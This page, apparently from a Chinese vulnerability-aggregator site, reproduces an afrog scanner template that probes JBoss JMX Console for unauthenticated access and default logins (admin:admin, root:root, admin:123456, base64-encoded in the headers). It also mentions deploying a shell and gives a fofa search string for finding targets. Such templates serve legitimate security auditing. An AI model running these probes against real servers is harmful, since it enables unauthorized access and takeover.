jboss-xml-console-unauthorized: JBoss JMX Console Weak Credential Discovery

日期: 2025-09-01 | 影响软件: JBoss | POC: 已公开

漏洞描述

利用jboss.deployment部署shell fofa: "jmx-console"

PoC代码[已公开]

id: jboss-xml-console-unauthorized

info:
    name: JBoss JMX Console Weak Credential Discovery
    author: paradessia
    severity: high
    verified: true
    description: |
        利用jboss.deployment部署shell
        fofa: "jmx-console"
    reference:
        - https://xz.aliyun.com/t/6103

rules:
    r0:
        request:
            method: GET
            path: /jmx-console/
        expression: response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
    r1:
        request:
            method: GET
            path: /jmx-console/
            headers:
                Authorization: "Basic YWRtaW46YWRtaW4="
        expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
    r2:
        request:
            method: GET
            path: /jmx-console/
            headers:
                Authorization: "Basic cm9vdDpyb290"
        expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
    r3:
        request:
            method: GET
            path: /jmx-console/
            headers:
                Authorization: "Basic YWRtaW46MTIzNDU2"
        expression: response.status == 200 && response.body.bcontains(b'JMImplementation')
expression: r0() || r1() || r2() || r3()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/unauthorized/jboss-xml-console-unauthorized.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2017-12149: Java/Jboss Deserialization [RCE] POC

CVE-2017-7504: JBoss 4.x JBossMQ JMS 反序列化漏洞 POC

CVE-2010-1429: Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC